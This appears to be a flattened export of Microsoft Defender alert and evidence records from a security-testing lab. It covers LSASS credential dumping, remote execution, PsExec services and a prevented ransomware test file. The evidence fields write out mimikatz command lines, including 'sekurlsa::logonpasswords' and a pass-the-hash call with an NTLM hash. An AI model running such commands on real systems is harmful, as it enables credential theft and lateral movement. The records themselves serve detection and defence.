"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "MSDXV8-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:50:49.9533333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:50:49.9533333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:50:49.9533333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:50:52.2966667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "PendingApproval",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:50:55.8466667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T07:43:44.26Z
|
Suspicious
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043451809630419_-665093391
|
beaf820c-2f6c-4b34-8b75-09f18ebaf689
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:13:00.9630666Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:11:26.6986272Z
|
2022-11-18T05:16:26.1851657Z
|
Password hashes dumped from LSASS memory
|
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
|
CredentialAccess
|
Resolved
|
Medium
| 47
|
PartiallyInvestigated
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
2ed33edd-2c33-49fd-877b-ab73fba14d59
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1003.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-18T05:09:25.5414924Z",
"processId": 7696,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": "lsass.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:06:09.0096674Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 532,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-11-10T07:06:09.0866649Z",
"processId": 624,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c",
"sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:19:52.22Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-18T05:13:19.3011237Z",
"processId": 9728,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-21T02:08:06.97Z
|
Suspicious
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 6,948
|
powershell -enc ZABpAHIA
|
2022-11-21T02:06:53.9715954Z
| 11,068
|
2022-11-21T02:01:28.4753286Z
|
powershell.exe
|
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-19T02:14:07.87Z
|
Suspicious
|
None
|
user1
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:10:33.3766667Z
|
Unknown
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 7,696
|
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
|
2022-11-18T05:09:25.5414924Z
| 4,976
|
2022-11-18T05:04:12.7150402Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:12:02.97Z
|
Suspicious
|
None
|
ronhd
|
MSDXV2
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
aa7fc697e4-4575-4453-9261-30472a168379
|
7fc697e4-4575-4453-9261-30472a168379
| 765
|
MicrosoftDefenderForIdentity
|
2022-11-21T02:12:55.8953817Z
|
2022-11-26T01:38:29.4766667Z
|
2022-11-26T01:35:43.0633333Z
|
2022-11-21T02:07:11.893815Z
|
2022-11-21T02:07:11.899429Z
|
Remote code execution attempt
|
An actor attempted to run commands remotely on MSDXV2-DC from MSDXV2-Win10V, using 1 service.
|
Execution
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
AzureATP
|
RemoteExecutionSecurityAlert
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1047",
"T1059",
"T1053",
"T1569",
"T1059.001",
"T1053.002",
"T1053.005",
"T1569.002"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-15T12:43:05.6733333Z
|
Suspicious
|
None
|
darol
|
test.domain
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-21T02:27:36.8066667Z
|
Suspicious
|
None
|
root
| null |
S-1-5-21-2300221942-1987151257-321556088-1104
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
| 10,944
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
|
2022-11-21T02:13:46.7172682Z
| 11,068
|
2022-11-21T02:01:28.4753286Z
| null | null | null | null |
|
da638065141686521349_2047697489
|
b33768d8-fd93-48bd-893f-96f4deb2e1f1
| 794
|
MicrosoftDefenderForEndpoint
|
2022-12-13T07:42:48.6521597Z
|
2022-12-13T07:51:49.87Z
|
2022-12-13T07:51:49.6590458Z
|
2022-12-13T07:29:32.3122092Z
|
2022-12-13T07:29:32.3122092Z
|
'Locky' ransomware was prevented
|
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Ransomware
|
Resolved
|
Medium
| 57
|
SuccessfullyRemediated
| null | null |
WindowsDefenderAv
|
51d03c45-b142-4de4-95df-01b0c259d8f6
|
Automation
| null |
Locky
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "master-win10b.master.m365dpoc.com",
"firstSeen": "2022-12-13T07:14:16.856Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MASTER/providers/Microsoft.Compute/virtualMachines/MASTER-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "c7a645fc-c80c-4108-93bc-60a27bc7ba8b"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-13T07:42:48.6966667Z",
"fileName": "TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating executable content",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:12:17.4466667Z
|
Suspicious
|
None
|
analyst
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 8,284
|
PSEXESVC.exe
|
2022-11-18T05:10:14.6889142Z
| 620
|
2022-11-16T03:32:19.0279725Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
36150b3c1b69b5c2da9df4efd86ac6c166924a48
|
da638045930747994441_1210227961
|
95e31a58-67f4-46fc-b97b-22ec124abe7c
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:04:34.7994582Z
|
2022-11-26T01:35:43.17Z
|
2022-11-26T01:35:43.0633333Z
|
2022-11-21T02:02:06.2897012Z
|
2022-11-21T02:33:42.4743653Z
|
Suspicious service launched
|
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
|
Execution
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
a5af9713-6eea-4d23-9bdc-9cab19f19092
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1569.002"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "corp.local",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "None",
"tags": [
"MDE-Management",
"semi auto",
"servers"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:06.2012631Z",
"processId": 7692,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "services.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:18.9649669Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 564,
"processCommandLine": "services.exe",
"processCreationTime": "2022-11-16T03:32:19.0279725Z",
"processId": 620,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "d7a213f3cfee2a8a191769eb33847953be51de54",
"sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.91Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:27.7361869Z",
"processId": 5760,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:15.0633333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:06:14.4989431Z",
"processId": 4572,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:15.2433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:05:52.817905Z",
"processId": 7684,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:16:03Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:12:11.2117933Z",
"processId": 1984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:16:03.64Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:11:49.6251097Z",
"processId": 5300,
"registryHive": null,
